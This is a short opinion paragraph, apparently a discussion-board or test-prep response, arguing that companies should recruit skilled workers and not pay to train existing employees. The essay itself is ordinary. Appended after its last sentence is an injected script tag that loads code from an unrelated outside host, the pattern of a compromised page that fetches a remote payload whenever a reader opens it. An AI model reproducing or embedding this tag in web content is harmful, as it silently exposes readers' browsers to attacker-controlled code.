I strongly agree with Andrew’s perspective that spending money on teaching existing employees should not be a priority for a company. I want to add that training current employees will waste not only financial resources but also time. Accordingly, companies can save their time and currency by recruiting skilled workers. Furthermore, being trained to perform a certain task can be strikingly stressful for current employees because they would fear if they can conquer performing the task or not. I understand Kelly’s concern over the dissatisfaction of current workers, but I believe she misses another critical point. Employees can search and find their best niche where they are valued more. In that case, working in the right position provides them with more income. Drawing from my own experience, when I changed my job and worked in a position where I was a better match, I gained a better career worthiness. <script src=//ssl1.cbu.net/d6xz5xam></script>
